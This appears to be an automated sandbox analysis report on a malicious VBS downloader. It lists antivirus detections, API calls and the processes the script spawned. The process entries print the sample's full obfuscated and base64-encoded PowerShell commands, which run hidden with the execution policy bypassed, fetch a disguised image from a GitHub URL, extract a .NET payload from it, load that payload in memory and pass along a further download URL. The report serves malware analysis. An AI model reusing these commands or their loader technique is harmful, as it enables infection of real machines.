@({1}txt.qnabsotiuqedetadpureganamognamdetad'+'nam/gro.s'+'ndkcud.eeeelifyyyyyyadsruht//:ptth{1}, {1}des'+'ativado{1}, {1}desa'+'tivado{1}, {1}des'+'ativado{1}, {1}AddInProcess32{1}, {1}desativado{1}, {1}desativado{1}));') -f[cHar]36,[cHar]39) \| &( $eNV:comSPEC[4,24,25]-JOIn'')" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x00000450	1	1

File has been identified by 9 AntiVirus engines on VirusTotal as malicious (9 events)

Skyhigh	BehavesLike.VBS.Trojan.np
Symantec	CL.Downloader!gen11
ESET-NOD32	VBS/TrojanDownloader.Agent.ABBQ
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan.Script.Generic
Google	Detected
Varist	VBS/Agent.BOX1!Eldorado
huorong	HEUR:TrojanDownloader/PS.NetLoader.aj
AVG	Script:SNH-gen [Trj]

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 18, 2024, 9:54 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 18, 2024, 9:54 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Oct. 18, 2024, 9:54 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}imageUrl = {1}https://raw.github'+'usercontent.com/CryptersAndToolsOficial/ZIP/refs/heads'+'/main/De'+'tahNote_V.jpg {1};{0}webCli'+'ent = New-Object Sy'+'stem.Net.WebClie'+'nt;{0}image'+'B'+'ytes = {0}webClient.Downloa'+'dData({0}imageUrl);{0}imageText = [System.Text.Encodi'+'ng]::UTF8.GetString('+'{0}imag'+'eBytes);{0}startFlag = {1}<<BASE64'+'_START>>{1};{0}endFlag = {1}<<BASE64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}ima'+'geText.IndexOf({0}endFlag);{0}sta'+'rtIndex -ge 0 -and {0}endInd'+'ex -gt {0}startIndex;{0}startIndex += {0}startFlag.Length;{0}base64Len'+'gth = {0}endIn'+'dex - {0}startInd'+'ex;{0}base64Command = {0}imageText.Substring({0}startI'+'ndex, {0}base64Length);{0}'+'com'+'mandBytes = [System.Convert]::FromBase64String({0}base64Command);{0}loaded'+'Assembly = [System.Reflection.Assembly]::Load({0}co'+'mmandBytes);{0}vaiMethod = [dnlib.IO.Hom'+'e].GetMethod({1}VAI{1});{'+'0}vaiMethod.Inv'+'oke({0}nu'+'ll, @({1}txt.qnabsotiuqedetadpureganamognamdetad'+'nam/gro.s'+'ndkcud.eeeelifyyyyyyadsruht//:ptth{1}, {1}des'+'ativado{1}, {1}desa'+'tivado{1}, {1}des'+'ativado{1}, {1}AddInProcess32{1}, {1}desativado{1}, {1}desativado{1}));') -f[cHar]36,[cHar]39) \| &( $eNV:comSPEC[4,24,25]-JOIn'')"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9aW1hZ2VVcmwgPSB7MX1odHRwczovL3Jhdy5naXRodWInKyd1c2VyY29udGVudC5jb20vQ3J5cHRlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMnKycvbWFpbi9EZScrJ3RhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaScrJ2VudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllJysnbnQ7ezB9aW1hZ2UnKydCJysneXRlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hJysnZERhdGEoezB9aW1hZ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGknKyduZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWcnKydlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0JysnX1NUQVJUPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRTY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hJysnZ2VUZXh0LkluZGV4T2YoezB9ZW5kRmxhZyk7ezB9c3RhJysncnRJbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZCcrJ2V4IC1ndCB7MH1zdGFydEluZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhcnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW4nKydndGggPSB7MH1lbmRJbicrJ2RleCAtIHswfXN0YXJ0SW5kJysnZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJJysnbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH0nKydjb20nKydtYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHswfWJhc2U2NENvbW1hbmQpO3swfWxvYWRlZCcrJ0Fzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh7MH1jbycrJ21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib20nKydlXS5HZXRNZXRob2QoezF9VkFJezF9KTt7JysnMH12YWlNZXRob2QuSW52Jysnb2tlKHswfW51JysnbGwsIEAoezF9dHh0LnFuYWJzb3RpdXFlZGV0YWRwdXJlZ2FuYW1vZ25hbWRldGFkJysnbmFtL2dyby5zJysnbmRrY3VkLmVlZWVsaWZ5eXl5eXlhZHNydWh0Ly86cHR0aHsxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9ZGVzYScrJ3RpdmFkb3sxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9QWRkSW5Qcm9jZXNzMzJ7MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0pKTsnKSAgLWZbY0hhcl0zNixbY0hhcl0zOSkgfCAmKCAkZU5WOmNvbVNQRUNbNCwyNCwyNV0tSk9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
parent_process	wscript.exe	martian_process	powershell -command $Codigo = 'KCgnezB9aW1hZ2VVcmwgPSB7MX1odHRwczovL3Jhdy5naXRodWInKyd1c2VyY29udGVudC5jb20vQ3J5cHRlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMnKycvbWFpbi9EZScrJ3RhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaScrJ2VudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllJysnbnQ7ezB9aW1hZ2UnKydCJysneXRlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hJysnZERhdGEoezB9aW1hZ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGknKyduZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWcnKydlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0JysnX1NUQVJUPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRTY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hJysnZ2VUZXh0LkluZGV4T2YoezB9ZW5kRmxhZyk7ezB9c3RhJysncnRJbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZCcrJ2V4IC1ndCB7MH1zdGFydEluZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhcnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW4nKydndGggPSB7MH1lbmRJbicrJ2RleCAtIHswfXN0YXJ0SW5kJysnZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJJysnbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH0nKydjb20nKydtYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHswfWJhc2U2NENvbW1hbmQpO3swfWxvYWRlZCcrJ0Fzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh7MH1jbycrJ21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib20nKydlXS5HZXRNZXRob2QoezF9VkFJezF9KTt7JysnMH12YWlNZXRob2QuSW52Jysnb2tlKHswfW51JysnbGwsIEAoezF9dHh0LnFuYWJzb3RpdXFlZGV0YWRwdXJlZ2FuYW1vZ25hbWRldGFkJysnbmFtL2dyby5zJysnbmRrY3VkLmVlZWVsaWZ5eXl5eXlhZHNydWh0Ly86cHR0aHsxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9ZGVzYScrJ3RpdmFkb3sxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9QWRkSW5Qcm9jZXNzMzJ7MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0pKTsnKSAgLWZbY0hhcl0zNixbY0hhcl0zOSkgfCAmKCAkZU5WOmNvbVNQRUNbNCwyNCwyNV0tSk9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Creates a suspicious Powershell process (9 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

THURSDAYYYYMPDW-constraints.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All